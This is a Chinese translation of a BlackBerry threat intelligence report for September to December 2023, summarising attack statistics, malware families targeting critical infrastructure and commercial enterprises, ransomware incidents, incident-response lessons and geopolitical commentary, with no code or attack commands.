导言
进入 2024 年,我们迎来了BlackBerry®全球威胁情报季度报告的整整一年。这是多么美好的一年。在过去的 12 个月中,BlackBerry 报告已成为全球网络安全专业人士和 CISO 的重要参考指南,帮助决策者了解影响行业的最新网络安全威胁、趋势和挑战。BlackBerry 利用内部遥测和外部资源,力求在本报告期内对全球网络威胁状况进行全面回顾。
在最新一期的报告中,BlackBerry 威胁研究与情报 团队对报告中的 "关键基础设施 "部分进行了改进和重新排版。这一重要部分现在包括金融、医疗保健和政府部门,以及现有的公用事业和通信关键基础设施部门。在新的章节中,我们还讨论了商业企业面临的威胁和挑战。
在报告的最后,我们将讨论报告期内我们在所有主要操作系统 (OS) 上面临的最大恶意软件威胁,并包括 MITRED3FEND™和 MITREATT&CK® 的可操作数据。
此外,我们还将自豪地介绍专业服务部门事件响应(IR)和取证团队的新内容,讨论他们在客户服务中遇到的威胁。
本报告涵盖 2023 年 9 月至 12 月期间遇到的威胁。
报告要点
数字 120 天
与以往涵盖三个月的全球威胁情报报告不同,本报告涵盖四个月,从 2023 年 9 月 1 日至 12 月 31 日。在本报告期内,BlackBerry®网络安全解决方案阻止了超过 520 万次针对受BlackBerry 解决方案保护的实体的网络攻击。这相当于每分钟约 31 次攻击,比上一报告期的每分钟 26 次攻击增加了 19%。
在本报告所述期间,新型恶意软件哈希值的每分钟比率比上一报告期高出 27%,BlackBerry 威胁研究与情报团队记录的哈希值从每分钟 2.9 个新型恶意软件样本增加到每分钟 3.7 个。
关键基础设施和商业企业
在本报告所述期间,BlackBerry的内部遥测记录显示,与行业相关的总攻击中有 62% 以上针对关键基础设施。恶意软件和其他网络威胁会对基础设施造成破坏性影响,不仅影响受感染的实体,还可能影响这些关键资产所支持的整个地区或国家。
此外,我们还需要报告一个全新的行业部门:商业企业。该行业包括零售、资本货物、批发贸易和其他相关行业。我们的遥测数据显示,在所有针对受BlackBerry 保护的资产的行业相关攻击中,近 33% 属于商业企业领域。此外,这些攻击中有高达 53% 的攻击使用了独特的恶意软件,这表明攻击者精心制作了新的恶意软件哈希值,从零开始构建或修改现有恶意软件,以使其更有机会渗透目标。
新颖的恶意软件通常在攻击者对某一特定组织或部门兴趣浓厚时使用。威胁行为者使用独特的恶意软件(而不是使用商品或 "现成 "的恶意软件)通常是有意为之,这意味着其目的是躲避防御系统,而防御系统通常是基于静态签名的传统防御系统。攻击者可以利用简单的自动化脚本,通过反复编译变化极小的相同源代码来创建新的恶意软件(又称独特哈希值)。
勒索软件和信息窃取者的袭击
正如我们在上一份报告中预测的那样,在本报告所述期间观察到的一个共同外部趋势是勒索软件利用新漏洞,大规模攻击潜在的易受攻击目标。大多数勒索软件组织纯粹是为了牟取暴利,通常会利用新的零日漏洞来增加成功几率和获取金钱收益。
在整个报告期内,全球重要基础设施和商业企业领域的知名实体都遭到了勒索软件集团的攻击。从美国的医疗保健业务到欧洲的能源供应商,勒索软件组织再次猖獗起来,往往危害到公共安全甚至人的生命。
从积极的方面来看,联邦调查局最近在打击当今威胁领域最大的勒索软件组织之一 LockBit 的斗争中迈出了一大步。在一次名为 "克洛诺斯行动"(Operation Cronos)的全球行动中,10 个国家的执法部门合作控制了LockBit集团的基础设施和泄密网站,从其服务器中收集信息,实施逮捕和制裁。LockBit 在 2019 年浮出水面,将银行和航空公司等众多组织作为攻击目标。BlackBerry ,继续与国际执法部门合作,确保 LockBit 等威胁组织不会逍遥法外。
在关键基础设施和商业企业领域,通过BlackBerry 网络安全解决方案(由Cylance®AI 提供支持),识别并阻止了大量信息窃取者(又称 "信息窃取者")家族。商品恶意软件也被用来攻击一些行业。这些恶意软件家族通常通过地下论坛作为恶意软件即服务(MaaS)出售,并被用于无数大规模网络攻击活动中。MaaS 是软件即服务(SaaS)模式的一个令人不快的分支,大大降低了网络犯罪新手的准入门槛。
可操作的情报
BlackBerry 全球威胁情报报告的目标是提供具有洞察力的网络安全数据以及背景网络威胁情报 (CTI)。为了进一步实现提供可操作情报的目标,我们在报告中加入了有关 MITRE 常用技术和应用对策的部分。本节总结了威胁组织在本报告期内使用的前 20种 MITRE ATT&CK技术,并与上一报告期进行了比较。在紫色团队演习中,可以利用我们的前 20 种战术、技术和程序 (TTP) 开展实际的威胁建模活动,从而将这些发现纳入可操作的模拟中。
此外,BlackBerry 威胁研究和情报团队利用MITRE D3FEND ,针对 2023 年 9 月至 12 月观察到的最主要恶意技术制定了一份应对措施清单。我们还加入了一个章节,介绍由 MITRE D3FEND 提供的受管检测和响应 (MDR) 数据。 CylanceGUARD®团队提供的托管检测和响应 (MDR) 数据。
最后,我要感谢BlackBerry 威胁研究与情报团队的全球精英研究人员,感谢他们不断推出世界一流的首发研究报告,为我们的读者提供信息和教育,同时不断改进我们的数据和Cylance 人工智能驱动的产品和服务。我们希望您能从我们最新一期的报告中找到详细而可行的见解。
伊斯梅尔-巴伦苏埃拉
威胁研究与情报副总裁BlackBerry
@aboutsecurity
这一时期的网络攻击
从 2023 年 9 月到 12 月,BlackBerry 网络安全解决方案阻止了超过 520 万次网络攻击。尽管本报告期比前几期报告期长,但按天计算的数据显示,与上一期报告相比,本报告期阻止的网络攻击增加了 19%。
此外,我们平均每天观察到约 5,300 个针对我们客户的独特恶意软件样本,本报告期内记录的样本总数超过 63 万个,比上一报告期增加了 27%。
按国家分列的袭击事件:统计数据
停止攻击
下图 2 显示了BlackBerry 网络安全解决方案阻止网络攻击最多的前五个国家(指阻止的攻击总数)。与上一份报告一样,美国受到的攻击最多,占本报告所述期间记录攻击的 76%。在亚太地区,澳大利亚和日本遭受了大量攻击,因此进入了我们的前五名,澳大利亚是新进入前五名的国家,排在第二位,而日本和以往的报告一样,排在第三位。在拉丁美洲,秘鲁遭受的攻击次数位居第四,这与之前的报告相同。在本报告所述期间,加拿大的攻击次数位居第五。
独特的恶意软件
图 2 还显示了BlackBerry 网络安全解决方案记录的独特恶意软件哈希值数量最多的五个国家。美国排名第一,其独特恶意软件的比例最高。独特恶意软件比例最高的第二、第三和第四个国家均位于亚太地区。韩国排名第二,日本(第三)和澳大利亚(第四)紧随其后。加拿大连续第二个报告期位居第五。
从上图 2 可以明显看出,每个国家阻止的攻击总数与记录的唯一哈希值数量并不一定相关。
这些结果背后有许多因素,包括攻击者的动机、攻击的复杂性和攻击的目标。攻击者的目标可能是针对一个国家(或一个特定行业)的普通民众,利用垃圾邮件活动来攻击大众。哈希值可以很容易地被重新散列,这不会影响文件恶意代码的运行,但会改变文件的独特哈希值算法,使其在反恶意软件扫描仪面前显得与众不同。
攻击者还可能使用更多的商品或 "现成 "恶意软件和工具来造成广泛破坏。然而,其他攻击者可能只针对一小群人、一个行业或一家公司。在超目标情况下,威胁行为者可能会以相关公司的个别员工为目标。这些恶意行为者甚至可能通过使用生成式人工智能软件来创建深度伪造,针对非常具体和典型的高价值目标部署更独特的工具和战术。
在上图 3 中,您可以看到从上一报告期到本报告期,不同国家阻止的攻击总数和发现的唯一恶意软件哈希值的变化情况。
- 美国、日本和秘鲁在阻止的攻击总数方面保持不变,而韩国在独特恶意软件方面的排名从第三位上升到第二位,超过了日本。
- 此外,在亚太地区,澳大利亚是本报告所述期间攻击次数最多的国家,仅次于美国,位居第二。在针对客户系统的独特哈希值数量方面,澳大利亚排名第四。
- BlackBerry根据我们的遥测记录,加拿大的实体在本报告期内受到的攻击数量有所减少,从第二位降至第五位。在本报告所述期间,在我们独特的恶意软件数据中,加拿大保持了第五名的位置。
澳大利亚最近进入了我们阻止攻击次数最多的前五名,这可能源于最近发生的地缘政治事件。2023 年 11 月,澳大利亚信号局(ASD)发布了《2022-2023 年度网络威胁报告》,揭示了澳大利亚政府、企业和个人面临的网络犯罪主要趋势。在报告中,ASD将重点关注核动力潜艇和其他先进军事能力的 AUKUS 合作伙伴关系确定为 "可能成为国家行为者为自己的军事项目窃取知识产权的目标"。 澳大利亚安全局局长接着说,随着澳大利亚 "军事能力的增强,这显然会引起其他行为者对其感兴趣的领域的关注"。
ASD 还报告称,2023 年,澳大利亚各地的个人和企业向执法部门举报的网络犯罪活动接近 94000 起,比上一年增加了 23%,仅勒索软件一项每年就给澳大利亚经济造成高达 30 亿澳元的损失。去年,澳大利亚遭受网络攻击的小型企业平均每家损失近 4.6 万美元,高于上一财年的 3 万美元。
为帮助应对激增的网络活动,澳大利亚安全局宣布启动 "立即行动,保持安全 "网络安全宣传活动,确定个人和中小型企业面临的主要网络威胁。该活动强调了 "立即行动 "应对网络威胁的必要性,指出 "长期以来,澳大利亚公民和企业在全球网络威胁面前只能自求多福",并提出了 "到 2030 年成为网络安全领域的世界领导者 "的大胆愿景。
按行业分类的攻击:统计数据
下图 4 显示了BlackBerry 在每个行业中阻止的攻击和发现的唯一哈希值。与以前的报告不同,我们将重点转向关键基础设施,将过去单独讨论的几个关键行业部门合并为一个部分。这是为了使我们对关键基础设施的定义与网络安全和基础设施安全局 (CISA) 的定义保持一致。根据下面的图表,在BlackBerry 记录的针对行业的攻击中,超过 62% 是针对关键基础设施组织的。
我们还更新了遥测技术,将商业企业纳入其中,在此期间,商业企业占所有被拦截行业攻击的 33%。然而,在记录的唯一哈希值中,有 53% 是针对商业企业的。(请记住,发现更多独特的哈希值意味着攻击者对入侵这些类型的组织特别感兴趣,这通常是因为成功的攻击会更有利可图)。
按行业分列的网络攻击
关键基础设施
关键基础设施是任何现代社会的支柱,对社会功能的各个方面都至关重要。事实上,美国的 CISA 已将16 个不同部门定义为关键基础设施。这些部门包括交通、医疗保健、能源、通信、金融、国防、工业部门和其他一些部门。
由于许多这些部门的系统和资产在相互关联的数字环境中交织在一起,它们发现自己经常处于网络威胁行为者的攻击范围内,这些行为者出于各种动机试图利用安全配置错误和漏洞。
在上一报告期,这种情况十分明显。 CylanceENDPOINT™BlackBerry 和其他BlackBerry 网络安全解决方案阻止了 200 多万次针对关键基础设施内各部门的攻击,仅金融部门就遭受了 100 多万次攻击。
此外,政府和公共部门组织受到的攻击最为多样化,超过 36% 的独特哈希值都是针对这一部门的。
关键基础设施面临的最大威胁
针对这些不同部门的网络威胁有可能造成大规模破坏,使其各自实体的关键资产、系统和网络瘫痪或受损。这反过来又会对一个国家的经济安全、公共卫生和社会稳定造成严重影响,无论攻击的规模、国家的经济发展或生活水平如何。
BlackBerry 在本报告所述期间,我们在内部遥测系统中发现了多个针对不同部门的恶意软件系列:
PrivateLoader是一个用 C++ 编写的恶意下载程序家族,自 2021 年首次被发现以来一直被持续观察。该恶意软件通常用于在受害者设备上部署信息窃取程序。根据我们的遥测数据,在本报告期内观察到 PrivateLoader 试图攻击与金融服务、食品和农业以及政府设施相关的系统。
PrivateLoader 以分发各种复杂的恶意有效载荷而闻名。该恶意软件的分发网络通过地下付费安装(PPI)服务进行管理,该服务为持续使用和开发该恶意软件及其基础设施提供资金。
RisePro是一种商品信息窃取程序,自 2022 年以来一直在野外出现。通过调查 PrivateLoader 的入侵指标(IoC),我们注意到有几个样本试图通过其分发服务部署恶意软件,其中就包括 RisePro。一旦进入受害者的设备,RisePro 就会尝试与其指挥控制 (C2) 通信,非法获取私人和敏感数据,然后将其发送到攻击者的服务器。这些被窃取的数据可以出售给其他恶意第三方,或用于针对受影响受害者的二次活动。
SmokeLoader是一种多用途恶意软件,在以前的报告期内,BlackBerry 。该恶意软件是一个独立的后门,但经常被用作其他恶意软件的传输机制。SmokeLoader 通常通过钓鱼文件或链接无意下载,然后在目标设备上立足。在本报告所述期间,观察到该恶意软件以能源行业为目标。
值得注意的是,在报告所述期间,乌克兰国家网络安全协调中心(NCSCC)发现与 SmokeLoader 有关的攻击激增,目标也是政府组织。SmokeLoader 的强大之处在于它能在受害者的设备上部署其他各种恶意软件。
据了解,SmokeLoader 过去曾投放过大量的信息窃取程序,如Amadey、RedLine和 Vidar,但此外还充当过勒索软件的投放机制。8Base 勒索软件背后的威胁组织曾使用 SmokeLoader 发布Phobos 勒索软件的变种。
PikaBot是 2023 年初出现的一种隐蔽性和躲避性强的恶意软件,全年都是一个突出的威胁。这种模块化恶意软件与QakBot 木马有许多相似之处,可以从其 C2 接收各种指令。在本报告所述期间,PikaBot 在政府和能源部门的实体中被发现。
PikaBot 具有持久性,并有多种功能防止威胁研究人员对其进行分析,包括多种反沙箱/反分析检查。一旦进入受害者的设备,该恶意软件就能接收并运行命令,收集有价值的设备信息,并执行从其 C2 接收到的命令。
商品信息窃取器在本季度也比较活跃。许多信息窃取器都作为 MaaS 出售,并被用于大规模活动。
LummaStealer (LummaC2)是一款基于 C 语言的信息窃取程序,主要从受害者设备中窃取私人和敏感数据。LummaStealer 能够显著获取加密货币钱包数据和双因素身份验证 (2FA) 浏览器扩展数据。在整个报告期间,BlackBerry ,观察到 LummaStealer 以金融机构和政府实体为目标。
记录创造者 (RaccoonStealer)是另一个广泛传播的信息窃取程序,由于一名核心威胁组织成员于 2022 年被捕而暂时关闭。然而,该组织在 2023 年年中又带着更新版本卷土重来。我们的遥测记录显示,RecordBreaker 在本报告期和上一报告期都以医疗保健机构为目标。
RedLine infostealer是BlackBerry在以前的报告中观察到的最多的威胁之一。这个.NET编译的窃取程序非常注重从多个软件和数字平台中进行凭证刮擦和窃取,重点是信用卡信息和加密货币钱包。
RedLine 通过地下论坛广泛销售,既可以订阅,也可以作为独立产品销售,价格相对低廉。在本报告所述期间,该恶意软件系列主要针对通信和政府部门。
更广泛的关键基础设施威胁环境
在本报告所述期间,更广泛的网络威胁也非常活跃,世界各地的关键基础设施组织遭受了许多值得注意的攻击。
10 月中旬,位于伊利诺伊州的莫里森社区医院据称是黑猫/ALPHV 勒索软件团伙入侵的受害者,并在其黑暗网站上出现。几周后,医院本身在其网站上发布了一份安全通知,称他们在 9 月下旬遭遇了一起事件,"涉及未经授权方访问我们的网络环境"。不过,通知中并未提及攻击者的姓名,也未提及是否有文件被锁定或盗取。
11 月,斯洛文尼亚国有能源实体 Holding Slovenske Elektrarne (HSE) 成为勒索软件攻击的受害者。作为该国约 60% 能源生产的提供者,幸运的是,漏洞和文件加密并未阻碍电力的生产或输出。
虽然没有正式点名此案的攻击者,但Rhysida 勒索软件组织可能是罪魁祸首。几周后,该组织在其网站上声称HSE已成为受害者。
11 月份还传出了另一个国有实体遭受勒索软件团伙攻击和入侵的消息。这次受害的是一家国有电信服务公司,该公司在一个月前遭到 RansomEXX 团伙的攻击,多达 6GB 的数据被盗。其中包括许多不同形式的个人身份信息(PII)。报道还指出,一个包含 100 多万客户信息的 CSV 数据文件在暗网上泄露。
RansomEXX(又名 Defray 和 Defray777)是 2018 年首次出现的勒索软件家族。该恶意软件家族既有 Windows 变种,也有 Linux 变种,主要用于对政府机构和制造商的高调利用。RansomEXX 以勒索软件即服务(RaaS)的模式运行,2022 年出现了一个用编程语言 Rust 编写的名为RansomEXX2的变种。
在美国,针对 CISA 所称的 "对 Unitronics 可编程逻辑控制器 (PLC) 的积极利用",CISA 于 2023 年 11 月 28 日发出警报。这些是用于供水和废水处理设施的计算机。该警报明确指出,这些类型的设施正成为网络威胁行为者的积极攻击目标,并建议其他供水和废水处理设施遵循所有建议的准则和预防措施。
尽管美国联邦调查局(FBI)在 2024 年 2 月试图摧毁LockBit帮派,但该帮派延续了 2023 年 11 月版《全球威胁情报报告》中提到的活动,继续以关键基础设施组织为攻击目标。2023 年圣诞节前夕,LockBit 帮派参与了对德国医院网络 Katholische Hospitalvereinigung Ostwestfalen gGmbH (KHO) 的攻击。清晨的攻击成功入侵并加密了文件数据,导致KHO 三家不同医院的服务严重中断。
LockBit 团伙还利用CVE-2023-4966漏洞(Citrix Bleed 漏洞)获取初始访问权限,瞄准关键基础设施内的其他实体和部门。这导致美国政府发布了一份联合网络安全建议 (CSA),建议各组织打补丁并遵循所有推荐的缓解指南和最佳实践。
对于那些过去曾受 LockBit 之害的人,现在可以使用文件恢复工具。联邦调查局、欧洲刑警组织、日本警方和国家犯罪问题机构合作,在"不再勒索赎金 "门户网站上提供了这些工具,目前有 37 种语言可供选择。
商业企业
BlackBerry 为全球众多客户和行业提供保护。商业企业部门包括商业和专业服务、资本货物、材料、零售、汽车、制造等。
在本报告所述期间,针对商业企业的攻击超过 100 万次,占BlackBerry 网络安全解决方案阻止的所有攻击的近 33%。此外,在短短 120 天内,有 53% 的独特哈希值针对这一领域,其中包括超过 170,000 个新型恶意软件文件。
顶级商业企业威胁
商业行业需要处理大量的电子资金转账交易和 PII 数据,这使它们成为信息窃取者的首要目标。这些高度敏感的数据随后会被威胁者扣留,以索取赎金,或通过暗网论坛卖给出价最高的人。
在整个报告所述期间,商业企业经常受到BlackBerry 过去报告中提到的臭名昭著的信息窃取者的攻击,如 RedLine 和Formbook/XLoader。
其他大量商品加载器和信息窃取器,如 SmokeLoader、PrivateLoader、Amadey 以及远程控制和监视软件(又名 Remcos)也紧随其后,大受欢迎。
Formbook是一种长期存在的 MaaS 信息窃取软件,近年来已改名为 XLoader。该恶意软件自 2016 年以来一直在野外流行,它从网络表单中抓取数据,并记录用户按键、浏览器数据和剪贴板数据。它能够从 90 多种不同的应用程序中获取和渗出数据。自 2021 年以来,基于 macOS 的版本已经面世。
Remcos是一种商业销售的远程访问工具(RAT),可以远程控制计算机。虽然它被宣传为合法的监控工具,但在黑客攻击活动中经常被滥用,并受到网络犯罪团伙的青睐。Cert-UA将 Remcos 与针对乌克兰和波兰的大规模网络攻击联系在一起。
我们的遥测技术还记录了一些最新的信息窃取器,即之前提到的 RisePro 窃取器和 OriginLogger。
OriginLogger是著名恶意软件Agent Tesla的进化版。Agent Tesla 系列通常作为基于订阅的 MaaS 出售,由 RAT 组成,具有从流行的网络浏览器窃取信息、捕获击键、甚至从受害者的设备上截图的功能。
更广泛的商业企业威胁格局
在过去四个月中,商业企业,尤其是制造业和零售业成为多次袭击的目标。
据报道,11 月,以色列零售商遭到黑客组织Cyber Toufan 的袭击,该组织还袭击了以色列托管公司 Signature-IT。据报道,自 2023 年 11 月以来,在以色列与哈马斯在加沙持续冲突的背景下,该组织针对以色列目标发起了数百次网络行动。许多全球零售商,如宜家,都受到了Signature-IT 攻击的严重影响。该组织在其 Telegram 频道上发布的帖子中声称,他们已经攻击了 150 多名受害者。据报道,他们清除并销毁了 1,000 多台服务器和重要数据库。
十二月提醒我们,公司面临的最大威胁往往是自身的自满情绪。房地产财富网(Real Estate Wealth Network)托管的一个不受互联网保护的数据库被恶意行为者发现并掠夺。该数据库有 1.16 TB 的数据(约 15 亿条记录),包括房产所有者、卖家的姓名和投资者的详细信息。该数据库是美国房地产数据的中心集合,其中包括政府官员的地址甚至债务信息。
此类攻击的受害者各不相同,取决于勒索软件犯罪集团的目标。2023 年底,最大的服装、鞋类和服饰制造商之一 VF 公司遭到 ALPHV(黑猫)勒索软件组织的攻击。目前,调查尚未结束,但已确认北脸、Timberland 和 Vans 等品牌的 3550 万客户的数据被盗。
地缘政治分析与评论
世界经济论坛的《2024 年全球风险报告》将网络不安全威胁列为 "未来两年预计最严重的全球风险 "之一。网络攻击拥有日益复杂的技术,包括利用人工智能(AI),人们一致认为,网络攻击将继续具有高度破坏性,并越来越多地针对关键基础设施。
BlackBerry 遥测技术表明,在本报告所述期间,关键基础设施实体面临着许多攻击。攻击正变得越来越复杂,新型恶意软件技术的使用,包括人工智能生成的恶意软件,增加了关键基础设施瘫痪的风险。世界各国政府已经启动了一系列措施,旨在提高关键基础设施的网络复原力,特别强调防范与恶意使用人工智能有关的风险。
虽然各国政府认识到人工智能具有巨大的潜在益处,包括提高关键基础设施系统的运行效率,但许多人也担心,通过在关键基础设施中部署基于人工智能的系统来推动效率优化,可能会对安全构成严重风险。
为了防止这种情况的发生,各国政府正在呼吁业界在开发和部署功能日益强大的人工智能模型时优先考虑安全问题:
"在过去的四十年里,从互联网的诞生到软件的大规模应用,再到社交媒体的兴起,我们目睹了安全和保障被迫退居次要地位,因为企业优先考虑的是上市速度和功能,而不是安全。人工智能软件的开发和实施必须打破以牺牲安全为代价的速度循环"。
-CISA人工智能路线图
全球各国政府纷纷制定和发布指南,鼓励以 "默认安全 "的方式开发和使用强大的人工智能系统。英国、加拿大、欧盟和七国集团等其他国家和政治联盟也发布了关于负责任地开发和使用先进人工智能系统的指导方针。其中包括全球 20 多个国家网络安全机构认可的联合指导方针,强调人工智能系统的构建者需要在设计、开发、部署和运行人工智能系统时做出知情决定,在系统的整个生命周期内优先考虑安全问题。
此外,2023 年 10 月,美国总统拜登发布了一项关于 "安全、可靠和值得信赖的人工智能 "的行政命令(第 14110 号行政命令),其中包括指示 CISA 评估与关键基础设施部门使用人工智能有关的潜在风险,包括部署人工智能可能使关键基础设施系统更容易遭受故障、物理攻击和网络攻击的方式。
2023 年 11 月,BlackBerry 宣布与马来西亚政府达成一项具有里程碑意义的网络安全协议,允许他们利用全套可信的BlackBerry 网络安全解决方案,以加强马来西亚的安全态势。作为这项努力的一部分,BlackBerry 与 SANS Institute合作,于 2024 年在马来西亚首都吉隆坡开设了一个先进的网络安全卓越中心 (CCoE)。CCoE 将提供专业培训,以提高马来西亚的网络安全能力和准备程度。BlackBerry 很高兴能帮助马来西亚建立网络安全学习生态系统,特别是在人工智能和机器学习领域,以帮助马来西亚网络安全人才队伍的成长和技能提升,并使印度洋-太平洋地区更加安全。
加拿大总理贾斯汀-特鲁多(Justin Trudeau)说:"网络安全是加拿大印度洋-太平洋战略(Indo-Pacific Strategy)的重要支柱,该战略旨在促进该地区的和平、安全与合作。网络安全是一个需要国际合作的共同挑战,这就是为什么我们大力支持在马来西亚建立BlackBerry 网络安全卓越中心的原因,马来西亚是加拿大重要的双边合作伙伴。通过支持马来西亚未来的网络防御者,并为加拿大和东南亚之间共享专业知识建立更强大的区域网络,我们可以进一步加强我们两国和更广泛地区的复原力和能力,以应对、威慑和响应网络威胁"。
在整个报告期内,各国政府和企业不断被提醒注意其网络的脆弱性。2023 年 9 月,有消息称中国黑客入侵了微软的电子邮件平台,从美国国务院账户中窃取了数万封电子邮件。此前有报道称,美国商务部等其他美国政府目标也遭到了类似攻击。最近,在加拿大全球事务部工作的加拿大当局也被披露遭遇了 "长期数据安全漏洞"。
加拿大网络安全中心在其最新的 "国家网络威胁评估"中强调,关键基础设施正日益面临网络威胁活动的风险。国家支持的行为体正积极寻求渗透这些系统,而人工智能等颠覆性技术可能会带来新的威胁。正如本报告所述,澳大利亚的关键基础设施也遭受了多起备受瞩目的网络攻击,其中包括澳大利亚第二大电信公司Optus和最大的私营医疗保险公司Medibank。
工业界也不能幸免于这种威胁,2023 年出现的新法规开始解决这一问题。例如,2023 年 12 月,一套要求上市公司在四天内向美国证券交易委员会披露 "重大 "网络事件的新规则开始生效。在欧洲,欧盟最近通过了《网络复原力法案》,对在欧盟销售的带有数字元素的硬件和软件产品提出了新的网络安全要求。除此之外,欧盟更新的《网络与信息安全指令》还要求采取额外措施,帮助解决关键基础设施实体的网络安全漏洞。
最后,2023 年 11 月,澳大利亚发布了《网络安全战略》,呼吁采取 "全国 "办法保护关键信息,共享威胁情报,推广使用安全可靠的技术产品。
面对不断变化的威胁环境,BlackBerry 一直呼吁必须实现安全的现代化,用基于 "零信任 "和 人工智能驱动的现代网络安全解决方案取代传统技术(如 VPN),这些解决方案可持续评估设备的安全态势,在网络攻击发生之前加以防范。随着威胁行为者开发出更复杂的方法来突破传统或遗留的 IT 安全防护,采用 "零信任 "方法的 "预防为主 "网络安全技术将变得越来越重要。
未来一年,日益复杂的网络攻击所构成的威胁可能会升级。全球民主国家的官员尤其关注的是,恶意行为者将在多大程度上利用数字技术来破坏民主进程。据估计,2024 年全球 64 个国家49%的人口将前往投票站投票,一些专家开始敲响警钟,选举程序和基础设施也可能成为首要攻击目标。美国政府 CISA 主任珍-伊斯特利警告说:"生成式人工智能将放大网络安全风险,使虚假内容更容易、更快速、更便宜地充斥全国。
她接着指出:"由于这项技术现在比以往任何时候都更容易获得,功能也更强大,恶意使用这项技术将使包括中国、伊朗和俄罗斯在内的意图破坏美国民主的邪恶行为者有能力为其战术增效,从而对美国选举进程的安全性构成考验。
事件响应分析和评论
事件响应(IR)是一种企业级方法,用于解决网络攻击和网络安全事件。事件响应的目标是控制和最大限度地减少漏洞造成的损失,并缩短恢复时间和降低恢复成本。 BlackBerry® Cybersecurity Services提供快速事件响应计划,帮助减轻任何网络攻击的影响,并确保数字恢复遵循最佳实践。BlackBerry IR 团队提供多管齐下的方法,包括网络事件响应、数据泄露响应、业务电子邮件泄露响应、勒索软件响应和数字取证。
以下是BlackBerry对投资者关系团队在本报告所述期间应对的网络威胁的一些主要看法:
BlackBerry Cybersecurity Services 观察到的几起事件中,最初的感染载体是一个易受攻击的、面向互联网的系统,如Cisco®Adaptive Security Appliance (ASA)、Citrix®NetScaler®和其他 VPN 设备。
在某些情况下,这些事件导致在客户环境中部署勒索软件。MITRE 最常用于通过面向互联网的系统部署勒索软件的技术是外部远程服务 -T1133。这凸显了企业及时对所有面向互联网的系统进行安全更新的必要性。例如,VPN、Citrix 等远程服务和其他访问机制可让用户从外部位置连接到内部网络资源。因此,常识告诉我们,给易受攻击的 VPN 打补丁可以主动防止威胁者通过 VPN 进入企业网络后投放勒索软件。
BlackBerry 观察到的事件中,最初的感染载体是一个面向互联网的 Microsoft®Windows®系统,允许在未实施多因素身份验证 (MFA) 的情况下进行远程访问。
这凸显了企业限制或拒绝远程访问不使用 MFA 的系统的必要性。此外,BlackBerry IR 团队还观察到一起事件,在这起事件中,威胁行为者在获得初始访问权限后,能够使用默认密码访问客户的内部系统。这强调了公司需要在所有系统(包括面向互联网的系统和内部系统)上实施强大的身份验证安全控制,并始终更改默认密码。(MITRE 技术外部远程服务 - T1133,有效账户 -T1078.001,默认凭证 -T0812)。
BlackBerry IR 团队还观察到一些GootLoader恶意软件事件,在这些事件中,公司员工在互联网上搜索合法文档,但却意外下载了受 GootLoader 感染的文档,导致客户网络内出现更多的系统感染。我们在之前关于 GootLoader 的报告中指出:"据了解,该恶意软件背后的威胁组织还采用搜索引擎优化(SEO)技术,将其木马网页放在互联网浏览器搜索结果的前沿和中心位置。这就是所谓的 SEO 中毒 - MITRE 子技术T1608.006。
这突出表明,公司有必要从战略上限制和/或拒绝公司的互联网浏览,并为公司员工提供有关安全互联网浏览做法和习惯的培训。
最有趣的网络故事
BlackBerry 威胁研究与情报团队研究新兴和持续性威胁,为防御者及其服务的组织提供情报分析。
在本报告期内,我们发现并分析了大量新出现的威胁行为者的活动。下面是我们的一些最新报告摘要。
您可以在BlackBerry 博客上找到所有这些报告的全文及其他内容。
AeroBlade 以美国航空航天业为目标进行狩猎
2023 年 11 月底,BlackBerry 发现了一个以前未知的威胁行为体,其目标是美国的一家航空航天组织,目的显然是进行商业和竞争性网络间谍活动。
BlackBerry 威胁研究和情报团队正在跟踪这个名为 AeroBlade 的威胁行为者。该行为者使用鱼叉式网络钓鱼作为发送机制:武器化文档(作为电子邮件附件发送)包含嵌入式远程模板注入技术和恶意 VBA 宏代码,可为最终有效载荷的执行提供下一个阶段。
有证据表明,攻击者的网络基础设施和武器化大约在 2022 年 9 月开始运作,攻击阶段发生在 2023 年 7 月。在此期间,攻击者改进了其工具集,使其更加隐蔽,而网络基础设施则保持不变。
考虑到最终有效载荷的功能和攻击主题,BlackBerry 以中高置信度评估认为,此次攻击的目标是商业网络间谍活动。其目的很可能是获取目标内部资源的可视性,以权衡其未来对赎金要求的敏感性。
以色列-哈马斯战争中使用的 BiBi 雨刷器现在可在 Windows 上运行
2023 年 10 月的最后几天,总部位于以色列的 IR 公司 Security Joes发布了关于一种新的Linux®系统雨刷恶意软件的发现,这种恶意软件在以色列-哈马斯战争中被黑客分子用来攻击以色列公司。Security Joes 目前跟踪的新恶意软件是 BiBi-Linux Wiper。24 小时后,BlackBerry 研究和情报小组发现了一个针对 Windows 系统的变种,我们将其命名为 BiBi-Windows Wiper。
哈马斯于 10 月 7 日对以色列发动恐怖袭击后,哈马斯与以色列之间的战争迅速扩展到网络领域。一个疑似与哈马斯有关联的黑客组织闯入以色列公司,侵入面向互联网的主机以访问其网络,并部署了一种新的、高度特定的网络武器,显然是企图破坏这些公司的基础设施。与绝大多数被点名的威胁组织不同,黑客组织并非受经济利益驱动,而是支持与正在进行的战争相关的政治意识形态。
新的恶意软件是由 Security Joes 的 IR 团队发现的,该团队当时正在为以色列公司提供援助。这次攻击没有勒索信或 C2 服务器,因此应对人员推测 BiBi-Linux 恶意软件是一个清除器,其部署的唯一目的就是破坏数据。
经过分析,该小组发现以色列总理本雅明-内塔尼亚胡的昵称 "Bibi "被硬编码在恶意软件和每个被销毁文件的扩展名中。Security Joes 在报告中推断,该雨刷器可能是 "由一群隶属于哈马斯的黑客创建的,目的是在战争背景下制造混乱"。
BlackBerry 检测到的 Windows 变种证实,疑似创建清除器的黑客分子正在继续构建恶意软件,并表明攻击范围扩大到了终端用户机器和应用服务器。通过攻击系统的多样化,坏人很可能会对更多的 Windows 机器造成破坏。Windows 目前占全球台式机用户总数的 68%,而使用 Linux 的用户仅占 2.9%。
随着以色列与哈马斯的战争持续到 2024 年,无论是在物理领域还是数字领域,似乎都没有安全港。在地缘政治事件引发的攻击中,通常会使用 "雨刷器",因为 "雨刷器 "的目标就是破坏,简单明了。
随着冲突的持续,我们很可能会看到更多此类袭击。
联邦调查局和司法部攻克恶意软件 "瑞士军刀 "Qakbot
2023 年 8 月的最后几天,美国司法部(DoJ)和联邦调查局(FBI)联合摧毁了运行时间最长的恶意软件家族和僵尸网络之一Qakbot,在全球执法和网络犯罪界掀起了轩然大波。
这次代号为 "猎鸭行动 "的国际协调行动使当局得以控制 Qakbot 的在线基础设施。专案组随后获得法院命令,从受感染设备中远程删除恶意软件,当时全球受感染设备约有70 万台,其中包括美国的20 万台电脑。
